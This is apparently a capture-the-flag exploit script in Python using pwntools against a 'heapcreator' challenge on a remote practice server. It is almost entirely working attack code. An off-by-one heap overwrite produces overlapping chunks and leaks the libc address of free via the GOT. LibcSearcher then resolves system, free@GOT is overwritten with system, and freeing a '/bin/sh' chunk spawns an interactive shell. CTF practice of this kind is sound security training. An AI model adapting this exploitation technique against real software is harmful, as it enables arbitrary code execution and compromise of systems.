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| from pwn import * from LibcSearcher import * context.log_level='debug' context.arch='amd64'
def add(size,contet): p.sendafter("Your choice :",b'1') p.sendafter("Size of Heap :",str(size)) p.sendafter("Content of heap:",contet)
def edit(index,contet): p.sendafter("Your choice :",b'2') p.sendafter("Index :",str(index)) p.sendafter("Content of heap :",contet)
def show(index): p.sendafter("Your choice :",b'3') p.sendafter("Index :", str(index))
def dele(index): p.sendafter("Your choice :",b'4') p.sendlineafter("Index :",str(index))
# p= process("./heapcreator") p=remote("node4.buuoj.cn",27274) add(0x18,b'a') add(0x10,b'b') add(0x10,b'c') add(0x10,b'/bin/sh') edit(0,b'a'*0x18+b'\x81') dele(1) add(0x70,b'a') edit(1,0x10*b'b'+p64(0)+p64(0x21)+p64(0x40)+p64(0x000000000602018)) # attach(p) show(1) free=p.recvuntil("\x7f")[-6:]+b'\0'*2 free = u64(free) print(hex(free)) libc=LibcSearcher("free",free) system=libc.dump("system") print(libc) #attach(p) edit(1,p64(system+free-libc.dump("free"))) dele(3) p.interactive()